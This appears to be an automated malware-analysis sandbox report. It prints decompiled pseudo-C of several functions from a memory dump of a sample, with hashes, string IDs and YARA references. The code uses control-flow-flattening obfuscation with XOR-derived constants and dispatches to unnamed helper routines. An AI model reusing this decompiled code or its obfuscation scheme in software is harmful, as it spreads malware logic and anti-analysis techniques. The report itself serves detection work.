                                              0x00222b31
                                              0x00222b38
                                              0x00222b3f
                                              0x00222b46
                                              0x00222b4d
                                              0x00222b54
                                              0x00222b58
                                              0x00222b5f
                                              0x00222b66
                                              0x00222b6d
                                              0x00222b77
                                              0x00222b7a
                                              0x00222b7c
                                              0x00222b8f
                                              0x00222b9d
                                              0x00222bb2
                                              0x00222bbe
                                              0x00222bcd
                                              0x00222bd3
                                              0x00222bda

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +/F$18$^$s
                                              • API String ID: 0-1171060364
                                              • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                              • Instruction ID: a5d4d4bb3229877b2435734199c38f24c42fab5800b21767527859a7e8fe29ac
                                              • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                              • Instruction Fuzzy Hash: D651F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002373AC, Relevance: 4.0, Strings: 3, Instructions: 219COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002373AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00239465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0023340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002389D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x23ca2c; // 0x4d8300
							E00236128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x23ca2c; // 0x4d8300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0022F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0022F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0022EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}











































                                              0x002373ac
                                              0x002373af
                                              0x002373ba
                                              0x002373bc
                                              0x002373c0
                                              0x002373c8
                                              0x002373d0
                                              0x002373d8
                                              0x002373e0
                                              0x002373f2
                                              0x002373f6
                                              0x002373ff
                                              0x00237404
                                              0x0023740a
                                              0x00237412
                                              0x0023741e
                                              0x00237423
                                              0x00237429
                                              0x00237431
                                              0x00237439
                                              0x00237441
                                              0x00237449
                                              0x00237451
                                              0x00237456
                                              0x0023745e
                                              0x00237466
                                              0x0023746e
                                              0x00237476
                                              0x0023747b
                                              0x00237480
                                              0x00237488
                                              0x00237495
                                              0x00237496
                                              0x0023749a
                                              0x002374a2
                                              0x002374aa
                                              0x002374b2
                                              0x002374ba
                                              0x002374c2
                                              0x002374ca
                                              0x002374cf
                                              0x002374d7
                                              0x002374df
                                              0x002374e7
                                              0x002374ef
                                              0x002374f7
                                              0x002374ff
                                              0x00237507
                                              0x0023750c
                                              0x00237514
                                              0x0023751c
                                              0x00237524
                                              0x0023752c
                                              0x00237534
                                              0x00237538
                                              0x00237540
                                              0x00237548
                                              0x00237550
                                              0x00237558
                                              0x00237560
                                              0x00237565
                                              0x0023756d
                                              0x0023757b
                                              0x0023757f
                                              0x00237587
                                              0x00237597
                                              0x0023759c
                                              0x002375a2
                                              0x002375aa
                                              0x002375b2
                                              0x002375ba
                                              0x002375bf
                                              0x002375c4
                                              0x002375cc
                                              0x002375d9
                                              0x002375da
                                              0x002375e4
                                              0x002375e8
                                              0x002375ec
                                              0x002375f4
                                              0x002375f8
                                              0x002375f8
                                              0x002375fc
                                              0x002375fc
                                              0x002375fc
                                              0x002375fc
                                              0x00237602
                                              0x00000000
                                              0x00000000
                                              0x00237608
                                              0x002376e2
                                              0x00000000
                                              0x002376e2
                                              0x00237614
                                              0x00237793
                                              0x0023779c
                                              0x002377a2
                                              0x002377a2
                                              0x00237620
                                              0x002376c4
                                              0x002376ce
                                              0x002376d6
                                              0x002376d7
                                              0x00000000
                                              0x002376d7
                                              0x0023762c
                                              0x00237698
                                              0x0023769d
                                              0x002376a0
                                              0x002376a3
                                              0x00000000
                                              0x00000000
                                              0x002376a9
                                              0x00000000
                                              0x002376a9
                                              0x00237634
                                              0x00000000
                                              0x0023763a
                                              0x00237648
                                              0x00237662
                                              0x00237667
                                              0x0023766e
                                              0x00237675
                                              0x00237678
                                              0x00237679
                                              0x0023767e
                                              0x00000000
                                              0x0023767e
                                              0x00237634
                                              0x002376f2
                                              0x00237774
                                              0x00237776
                                              0x00000000
                                              0x00237776
                                              0x002376fa
                                              0x0023775a
                                              0x00237760
                                              0x00237761
                                              0x00000000
                                              0x00237761
                                              0x00237702
                                              0x00000000
                                              0x00000000
                                              0x00237709
                                              0x0023770e
                                              0x00237728
                                              0x0023772c
                                              0x00237731
                                              0x00237734
                                              0x0023773a
                                              0x00237740
                                              0x00237740
                                              0x0023773a
                                              0x00000000
                                              0x0023777b
                                              0x0023777b
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 'V$\$bo
                                              • API String ID: 0-4178943049
                                              • Opcode ID: 54bbf05af18814b9a6df618109305a24e299ee10e84e889a4d901e8013b85d17
                                              • Instruction ID: 118fe5d87acfd89e7527d32cbd7cd5d1379f99dd154edd978b29c5756cf75081
                                              • Opcode Fuzzy Hash: 54bbf05af18814b9a6df618109305a24e299ee10e84e889a4d901e8013b85d17
                                              • Instruction Fuzzy Hash: 54A162B251C3429FD768CF28C48940BFBF1FBC4758F50892DF99996260C7B58A588F86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002296CD, Relevance: 3.9, Strings: 3, Instructions: 191COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E002296CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0022602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00228736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0023360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002350F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00227998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00237A0F(_t222);
											_t192 = E002278A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}
































                                              0x002296d7
                                              0x002296de
                                              0x002296e5
                                              0x002296e7
                                              0x002296e9
                                              0x002296ea
                                              0x002296ef
                                              0x002296f7
                                              0x00229700
                                              0x00229707
                                              0x0022970c
                                              0x00229712
                                              0x0022971a
                                              0x00229722
                                              0x0022972a
                                              0x00229732
                                              0x0022973a
                                              0x00229742
                                              0x0022974a
                                              0x00229752
                                              0x0022975a
                                              0x00229762
                                              0x0022976a
                                              0x00229772
                                              0x0022977b
                                              0x00229780
                                              0x00229786
                                              0x0022978a
                                              0x00229792
                                              0x0022979a
                                              0x0022979f
                                              0x002297a7
                                              0x002297af
                                              0x002297b7
                                              0x002297bf
                                              0x002297c7
                                              0x002297cf
                                              0x002297d7
                                              0x002297df
                                              0x002297e7
                                              0x002297ef
                                              0x002297f7
                                              0x002297ff
                                              0x00229807
                                              0x0022980f
                                              0x00229817
                                              0x0022981f
                                              0x00229824
                                              0x00229829
                                              0x00229831
                                              0x0022983d
                                              0x00229842
                                              0x0022984d
                                              0x0022984e
                                              0x00229852
                                              0x0022985a
                                              0x00229862
                                              0x0022986a
                                              0x00229875
                                              0x00229879
                                              0x00229883
                                              0x00229890
                                              0x00229898
                                              0x002298a6
                                              0x002298a9
                                              0x002298ad
                                              0x002298b5
                                              0x002298bd
                                              0x002298ca
                                              0x002298ce
                                              0x002298d6
                                              0x002298de
                                              0x002298e6
                                              0x002298ee
                                              0x002298f6
                                              0x002298fe
                                              0x00229906
                                              0x00229910
                                              0x00229910
                                              0x00229922
                                              0x002299d7
                                              0x002299d8
                                              0x002299dc
                                              0x002299e1
                                              0x002299e5
                                              0x002299e7
                                              0x002299e9
                                              0x00000000
                                              0x002299e9
                                              0x00229928
                                              0x0022992e
                                              0x002299b9
                                              0x002299be
                                              0x002299c1
                                              0x00000000
                                              0x00229930
                                              0x00229932
                                              0x00229995
                                              0x0022999a
                                              0x0022999d
                                              0x00000000
                                              0x00229934
                                              0x0022993a
                                              0x00229a1d
                                              0x00229940
                                              0x00229946
                                              0x00000000
                                              0x0022994c
                                              0x0022994c
                                              0x00229953
                                              0x00229972
                                              0x00229977
                                              0x0022997a
                                              0x0022997f
                                              0x00000000
                                              0x0022997f
                                              0x00229946
                                              0x0022993a
                                              0x00229932
                                              0x0022992e
                                              0x00229a26
                                              0x00229a28
                                              0x00229a2c
                                              0x00229a2c
                                              0x00229a36
                                              0x00229a36
                                              0x002299f0
                                              0x002299f2
                                              0x002299f7
                                              0x002299fa
                                              0x002299fa
                                              0x002299fa
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &E$D\$M^
                                              • API String ID: 0-182273106
                                              • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                              • Instruction ID: e180c5684d29d170f3f8387aaee74c73b7a4a7078e523a286e60377ebc09245a
                                              • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                              • Instruction Fuzzy Hash: F4816471518341AFD358CF65C88981BBBE0BBD8354F50891CF196862A1D3B6CA99CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022153C, Relevance: 3.9, Strings: 3, Instructions: 131COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0022153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0022E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00228697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002260B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002228CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}






















                                              0x0022153c
                                              0x00221546
                                              0x00221550
                                              0x00221558
                                              0x0022155d
                                              0x00221565
                                              0x0022156d
                                              0x00221575
                                              0x0022157d
                                              0x00221585
                                              0x0022158d
                                              0x00221595
                                              0x0022159d
                                              0x002215a5
                                              0x002215ad
                                              0x002215b5
                                              0x002215ba
                                              0x002215bf
                                              0x002215c7
                                              0x002215cf
                                              0x002215d7
                                              0x002215df
                                              0x002215e7
                                              0x002215ef
                                              0x002215f7
                                              0x002215ff
                                              0x00221604
                                              0x00221609
                                              0x00221611
                                              0x00221619
                                              0x00221626
                                              0x0022162a
                                              0x0022162c
                                              0x00221634
                                              0x0022163c
                                              0x00221644
                                              0x0022164c
                                              0x00221654
                                              0x0022165c
                                              0x0022166a
                                              0x0022166d
                                              0x00221675
                                              0x00221679
                                              0x0022167d
                                              0x00221685
                                              0x0022168d
                                              0x00221695
                                              0x0022169d
                                              0x0022169d
                                              0x002216af
                                              0x0022176c
                                              0x0022177c
                                              0x0022177f
                                              0x00221785
                                              0x0022178e
                                              0x0022179c
                                              0x002216b5
                                              0x002216bb
                                              0x00221733
                                              0x0022173b
                                              0x00000000
                                              0x002216bd
                                              0x002216c3
                                              0x00221715
                                              0x0022171a
                                              0x0022171e
                                              0x00221720
                                              0x00000000
                                              0x00221720
                                              0x002216c5
                                              0x002216cb
                                              0x002216f6
                                              0x002216fb
                                              0x00221700
                                              0x00221706
                                              0x00000000
                                              0x00221706
                                              0x002216cd
                                              0x002216d3
                                              0x00000000
                                              0x002216d9
                                              0x002216d9
                                              0x00000000
                                              0x002216d9
                                              0x002216d3
                                              0x002216cb
                                              0x002216c3
                                              0x002216bb
                                              0x002217a0
                                              0x002217ab
                                              0x002217ab
                                              0x00221757
                                              0x00221759
                                              0x0022175e
                                              0x0022175e
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Wx$i^%4$i^%4
                                              • API String ID: 0-1584002782
                                              • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                              • Instruction ID: 9e1d6fdb3593b6bbb9f511f60d286fd3ef2d42f35d77fd4fc17ed35f33860f77
                                              • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                              • Instruction Fuzzy Hash: 4D5167311183429BD3A8CE65D18982BFBE1BBD4718F140E1DF496922A0D7B4DA69CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00237D03, Relevance: 3.9, Strings: 3, Instructions: 127COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00237D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x23ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00228736(_t119);
							 *0x23ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002259D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x23ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00221132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0022E377);
					_t117 =  *0x23ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}























                                              0x00237d03
                                              0x00237d06
                                              0x00237d10
                                              0x00237d18
                                              0x00237d20
                                              0x00237d30
                                              0x00237d35
                                              0x00237d3b
                                              0x00237d40
                                              0x00237d45
                                              0x00237d52
                                              0x00237d5f
                                              0x00237d6c
                                              0x00237d74
                                              0x00237d7c
                                              0x00237d84
                                              0x00237d8c
                                              0x00237d94
                                              0x00237d9c
                                              0x00237da4
                                              0x00237db0
                                              0x00237db5
                                              0x00237dbb
                                              0x00237dc3
                                              0x00237dcb
                                              0x00237dd0
                                              0x00237dd8
                                              0x00237de0
                                              0x00237ded
                                              0x00237dee
                                              0x00237df2
                                              0x00237dfa
                                              0x00237e02
                                              0x00237e0a
                                              0x00237e12
                                              0x00237e1a
                                              0x00237e22
                                              0x00237e2f
                                              0x00237e33
                                              0x00237e3b
                                              0x00237e43
                                              0x00237e48
                                              0x00237e50
                                              0x00237e58
